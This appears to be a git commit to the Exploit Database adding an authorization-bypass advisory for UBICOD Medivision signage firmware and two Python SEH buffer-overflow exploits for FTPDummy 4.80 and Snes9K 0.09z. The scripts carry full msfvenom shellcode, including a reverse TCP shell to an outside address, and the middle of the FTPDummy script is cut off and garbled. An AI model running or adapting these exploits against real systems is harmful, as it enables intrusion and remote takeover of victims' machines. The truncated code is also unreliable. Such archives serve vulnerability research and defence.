From dc7e147e7055b89661151c8722fb65c5f9ca813f Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 24 Jul 2020 05:02:04 +0000 Subject: [PATCH] DB: 2020-07-24 3 changes to exploits/shellcodes FTPDummy 4.80 - Local Buffer Overflow (SEH) Snes9K 0.09z - 'Port Number' Buffer Overflow (SEH) UBICOD Medivision Digital Signage 1.5.1 - Authorization Bypass --- exploits/hardware/webapps/48684.txt | 51 ++++++++++++++++++ exploits/windows/local/48685.py | 80 +++++++++++++++++++++++++++++ exploits/windows/local/48686.py | 61 ++++++++++++++++++++++ files_exploits.csv | 3 ++ 4 files changed, 195 insertions(+) create mode 100644 exploits/hardware/webapps/48684.txt create mode 100755 exploits/windows/local/48685.py create mode 100755 exploits/windows/local/48686.py diff --git a/exploits/hardware/webapps/48684.txt b/exploits/hardware/webapps/48684.txt new file mode 100644 index 000000000..ea002d534 --- /dev/null +++ b/exploits/hardware/webapps/48684.txt @@ -0,0 +1,51 @@ +# Title: UBICOD Medivision Digital Signage 1.5.1 - Authorization Bypass +# Date: 2020-07-23 +# Author: LiquidWorm +# Product web page: http://www.medivision.co.kr +# CVE: N/A + +Vendor: UBICOD Co., Ltd. | MEDIVISION INC. +Product web page: http://www.medivision.co.kr +Affected version: Firmware 1.5.1 (2013.01.3) + +Summary: Medivision is a service that provides everything from DID operation to +development of DID (Digital Information Display) optimized for hospital environment +and production of professional contents, through DID product installation, image, +video content planning, design work, and remote control. This is a one-stop solution +that solves management at once. + +Desc: The application suffers from a privilege escalation vulnerability. Normal user +can elevate his/her privileges by navigating to /html/user (via IDOR) page sending an +HTTP GET request setting the parameter 'ft[grp]' to integer value '3' gaining super +admin rights. + +Tested on: Apache/2.4.7 (Ubuntu) + PHP/5.5.9-1ubuntu4.22 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2020-5575 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5575.php + + +19.06.2020 + +-- + + + + +
+ + + + + + + +
+ + \ No newline at end of file diff --git a/exploits/windows/local/48685.py b/exploits/windows/local/48685.py new file mode 100755 index 000000000..8a6aaab2a --- /dev/null +++ b/exploits/windows/local/48685.py @@ -0,0 +1,80 @@ +# Exploit Title: FTPDummy 4.80 - Local Buffer Overflow (SEH) +# Date: 2020-07-22 +# Author: Felipe Winsnes +# Software Link: http://www.dummysoftware.com/ftpdummy.html +# Version: 4.80 +# Tested on: Windows 7 (x86) + +# Blog: https://whitecr0wz.github.io/ + +# Proof of Concept: +# 1.- Run the python script, it will create the file "ftpdummypref3.dat". +# 2.- Place the generated file into "C:\Program Files\FTPDummy!\". +# 3.- Open the application. +# 4.- Profit. + +import struct + +# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed EXITFUNC=thread +# Payload size: 448 bytes + +buf = b"" +buf += b"\x89\xe0\xd9\xc5\xd9\x70\xf4\x5f\x57\x59\x49\x49\x49" +buf += b"\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43" +buf += b"\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41" +buf += b"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42" +buf += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x69\x6c\x68\x68\x6e" +buf += b"\x62\x53\x30\x53\x30\x67\x70\x35\x30\x6f\x79\x5a\x45" +buf += b"\x34\x71\x4f\x30\x71\x74\x4e\x6b\x30\x50\x74\x70\x6c" +buf += b"\x4b\x43\x62\x54\x4c\x4e\x6b\x56\x32\x67\x64\x4c\x4b" +buf += b"\x32\x52\x36\x48\x74\x4f\x58\x37\x61\x5a\x35\x76\x30" +buf += b"\x31\x69\x6f\x6c\x6c\x37\x4c\x35\x31\x31\x6c\x75\x52" +buf += b"\x54\x6c\x57\x50\x39\x51\x48\x4f\x66\x6d\x56\x61\x7a" +buf += b"\x67\x59\x72\x6c\x32\x52\x72\x63\x67\x4e\x6b\x62\x72" +buf += b"\x32\x30\x4e\x6b\x73\x7a\x77\x4c\x6c\x4b\x52\x6c\x54" +buf += b"\x51\x53\x48\x68\x63\x51\x58\x37\x71\x4b\x61\x72\x71" +buf += b"\x4c\x4b\x32\x79\x61\x30\x47\x71\x5a\x73\x4c\x4b\x57" +buf += b"\x39\x76\x78\x48\x63\x47\x4a\x67\x39\x6e\x6b\x50\x34" +buf += b"\x6e\x6b\x43\x31\x4a\x76\x34\x71\x69\x6f\x6c\x6c\x49" +buf += b"\x51\x6a\x6f\x54\x4d\x65\x51\x68\x47\x45\x68\x6b\x50" +buf += b"\x63\x45\x6b\x46\x76\x63\x43\x4d\x6a\x58\x67\x4b\x43" +buf += b"\x4d\x74\x64\x51\x65\x4a\x44\x42\x78\x6c\x4b\x76\x38" +buf += b"\x56\x44\x53\x31\x6e\x33\x32\x46\x4c\x4b\x36\x6c\x72" +buf += b"\x6b\x6c\x4b\x66\x38\x75\x4c\x53\x31\x4a\x73\x6e\x6b" +buf += b"\x33\x34\x4c\x4b\x47\x71\x6e\x30\x4b\x39\x77\x34\x44" +buf += b"\x64\x35\x74\x51\x4b\x63\x6b\x63\x51\x70\x59\x70\x5a" +buf += b"\x76\x31\x69\x6f\x59\x70\x73\x6f\x53\x6f\x71\x4a\x4c" +buf += b"\x4b\x46\x72\x38\x6b\x6e\x6d\x71\x4d\x50\x6a\x47\x71" +buf += b"\x4e\x6d\x4f\x75\x4e\x52\x47\x70\x37\x70\x53\x30\x42" +buf += b"\x70\x32\x48\x76\x51\x6e\x6b\x32\x4f\x4f\x77\x79\x6f" +buf += b"\x5a\x75\x4f\x4b\x6b\x50\x47\x6d\x44\x6a\x57\x7a\x50" +buf += b"\x68\x79\x36\x4e\x75\x6d\x6d\x6d\x4d\x6b\x4f\x49\x45" +buf += b"\x57\x4c\x77\x76\x51\x6c\x74\x4a\x4b\x30\x49\x6b\x59" +buf += b"\x70\x34\x35\x63\x35\x4d\x6b\x50\x47\x74\x53\x44\x32" +buf += b"\x52\x4f\x31\x7a\x75\x50\x53\x63\x69\x6f\x38\x55\x42" +buf += b"\x43\x61\x71\x72\x4c\x65\x33\x54\x6e\x61\x75\x70\x78" +buf += b"\x50\x65\x73\x30\x41\x41" + +start = "\x41"* 8 +start += "\x0d\x0a\x31\x0d\x0a" +ending = "\x0d\x0a" + +end = "170.1.1.0" +end += "\x0d\x0a" +end += "\x22" +end += "C:\Archivos2de2programa\FTPDummy!\FTPDummy!2418101EXE" +end += "\x22" + +nseh = "\x70\x08\x71\x06" +seh = struct.pack(" Connect to Server +# 5. Paste the clipboard into the "Port Number" field +# 6. Click on Connect and then on OK + +#!/usr/bin/python + +# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.164.129 LPORT=443 -b "\x00\x0a\x0d" -f py + +buf = "" +buf += "\xd9\xc3\xbf\x7c\xdc\xed\x95\xd9\x74\x24\xf4\x58\x29" +buf += "\xc9\xb1\x52\x31\x78\x17\x83\xc0\x04\x03\x04\xcf\x0f" +buf += "\x60\x08\x07\x4d\x8b\xf0\xd8\x32\x05\x15\xe9\x72\x71" +buf += "\x5e\x5a\x43\xf1\x32\x57\x28\x57\xa6\xec\x5c\x70\xc9" +buf += "\x45\xea\xa6\xe4\x56\x47\x9a\x67\xd5\x9a\xcf\x47\xe4" +buf += "\x54\x02\x86\x21\x88\xef\xda\xfa\xc6\x42\xca\x8f\x93" +buf += "\x5e\x61\xc3\x32\xe7\x96\x94\x35\xc6\x09\xae\x6f\xc8" +buf += "\xa8\x63\x04\x41\xb2\x60\x21\x1b\x49\x52\xdd\x9a\x9b" +buf += "\xaa\x1e\x30\xe2\x02\xed\x48\x23\xa4\x0e\x3f\x5d\xd6" +buf += "\xb3\x38\x9a\xa4\x6f\xcc\x38\x0e\xfb\x76\xe4\xae\x28" +buf += "\xe0\x6f\xbc\x85\x66\x37\xa1\x18\xaa\x4c\xdd\x91\x4d" +buf += "\x82\x57\xe1\x69\x06\x33\xb1\x10\x1f\x99\x14\x2c\x7f" +buf += "\x42\xc8\x88\xf4\x6f\x1d\xa1\x57\xf8\xd2\x88\x67\xf8" +buf += "\x7c\x9a\x14\xca\x23\x30\xb2\x66\xab\x9e\x45\x88\x86" +buf += "\x67\xd9\x77\x29\x98\xf0\xb3\x7d\xc8\x6a\x15\xfe\x83" +buf += "\x6a\x9a\x2b\x03\x3a\x34\x84\xe4\xea\xf4\x74\x8d\xe0" +buf += "\xfa\xab\xad\x0b\xd1\xc3\x44\xf6\xb2\x2b\x30\x5c\xc3" +buf += "\xc4\x43\x9c\xc5\xaf\xcd\x7a\xaf\xdf\x9b\xd5\x58\x79" +buf += "\x86\xad\xf9\x86\x1c\xc8\x3a\x0c\x93\x2d\xf4\xe5\xde" +buf += "\x3d\x61\x06\x95\x1f\x24\x19\x03\x37\xaa\x88\xc8\xc7" +buf += "\xa5\xb0\x46\x90\xe2\x07\x9f\x74\x1f\x31\x09\x6a\xe2" +buf += "\xa7\x72\x2e\x39\x14\x7c\xaf\xcc\x20\x5a\xbf\x08\xa8" +buf += "\xe6\xeb\xc4\xff\xb0\x45\xa3\xa9\x72\x3f\x7d\x05\xdd" +buf += "\xd7\xf8\x65\xde\xa1\x04\xa0\xa8\x4d\xb4\x1d\xed\x72" +buf += "\x79\xca\xf9\x0b\x67\x6a\x05\xc6\x23\x9a\x4c\x4a\x05" +buf += "\x33\x09\x1f\x17\x5e\xaa\xca\x54\x67\x29\xfe\x24\x9c" +buf += "\x31\x8b\x21\xd8\xf5\x60\x58\x71\x90\x86\xcf\x72\xb1" + +exploit = "A"*420 +exploit += "\x74\x06\x75\x04" +# 0x10015140 pop pop ret; SDL.dll +exploit += "\x40\x51\x01\x10" +exploit += "\x41"*(2000-428-len(buf)) +exploit += buf + +f = open("exploit.txt", "w") +f.write(exploit) +f.close() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 77a83fdbd..cc50ac2d9 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11123,6 +11123,8 @@ id,file,description,date,author,type,platform,port 48677,exploits/windows/local/48677.txt,"Sonar Qube 8.3.1 - 'SonarQube Service' Unquoted Service Path",2020-07-17,"Velayutham Selvaraj",local,windows, 48678,exploits/windows/local/48678.py,"Simple Startup Manager 1.17 - 'File' Local Buffer Overflow (PoC)",2020-07-17,PovlTekstTV,local,windows, 48680,exploits/windows/local/48680.py,"NetPCLinker 1.0.0.0 - Buffer Overflow (SEH Egghunter)",2020-07-22,"Saeed reza Zamanian",local,windows, +48685,exploits/windows/local/48685.py,"FTPDummy 4.80 - Local Buffer Overflow (SEH)",2020-07-23,"Felipe Winsnes",local,windows, +48686,exploits/windows/local/48686.py,"Snes9K 0.09z - 'Port Number' Buffer Overflow (SEH)",2020-07-23,MasterVlad,local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -42930,3 +42932,4 @@ id,file,description,date,author,type,platform,port 48681,exploits/multiple/webapps/48681.txt,"Docsify.js 4.11.4 - Reflective Cross-Site Scripting",2020-07-22,"Amin Sharifi",webapps,multiple, 48682,exploits/php/webapps/48682.txt,"WordPress Theme NexosReal Estate 1.7 - 'search_order' SQL Injection",2020-07-22,"Vlad Vector",webapps,php, 48683,exploits/multiple/webapps/48683.py,"Sophos VPN Web Panel 2020 - Denial of Service (Poc)",2020-07-22,"Berk KIRAS",webapps,multiple, +48684,exploits/hardware/webapps/48684.txt,"UBICOD Medivision Digital Signage 1.5.1 - Authorization Bypass",2020-07-23,LiquidWorm,webapps,hardware,